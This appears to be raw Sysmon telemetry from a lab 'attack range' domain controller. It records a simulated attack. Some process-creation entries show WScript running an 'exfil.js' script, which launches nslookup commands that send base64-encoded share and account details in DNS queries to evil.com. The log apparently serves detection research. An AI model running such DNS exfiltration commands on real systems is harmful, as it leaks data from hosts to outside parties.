51791 10341000x8000000000000000211778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CA44-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-18F3-629A-C844-000000005F02}26928124C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-CA44-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.068{2E1864BB-18F4-629A-CA44-000000005F02}6324C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-C844-000000005F02}2692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqcto.tmp 2>&1 10341000x8000000000000000211772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.017{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-C944-000000005F02}4996C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.017{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-C944-000000005F02}4996C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.017{2E1864BB-18F4-629A-C944-000000005F02}49967732C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C844-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.001{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-C944-000000005F02}4996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C844-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-18E0-629A-6742-000000005F02}39767144C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-C844-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044810Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:37.789{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52386-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000212492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.988{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-1445-000000005F02}7964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-1345-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-18E0-629A-6742-000000005F02}39765624C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-1345-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.982{2E1864BB-18F5-629A-1345-000000005F02}6140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllvepfyy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjsdn.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000212483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.473{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50998- 354300x8000000000000000212482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.473{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-50998-false127.0.0.1-53domain 354300x8000000000000000212481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-50997-false127.0.0.1-53domain 354300x8000000000000000212480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50997- 354300x8000000000000000212479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-50997-false127.0.0.1-53domain 354300x8000000000000000212478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-50996-false127.0.0.1-53domain 354300x8000000000000000212477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50996- 354300x8000000000000000212476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-50996-false127.0.0.1-53domain 354300x8000000000000000212475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-50995-false127.0.0.1-53domain 354300x8000000000000000212474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50995- 354300x8000000000000000212473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.398{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-50995-false127.0.0.1-53domain 354300x8000000000000000212472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.338{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50994- 354300x8000000000000000212471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.338{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50993- 354300x8000000000000000212470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50992- 354300x8000000000000000212469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.337{00000000-0000-0000-0000-000000000000}3192<unknown process>-udptruefalse127.0.0.1-50992-false127.0.0.1-53domain 354300x8000000000000000212468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-50969-false127.0.0.1-53domain 354300x8000000000000000212467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-50969-false127.0.0.1-53domain 354300x8000000000000000212466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-50968-false127.0.0.1-53domain 354300x8000000000000000212465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-50968-false127.0.0.1-53domain 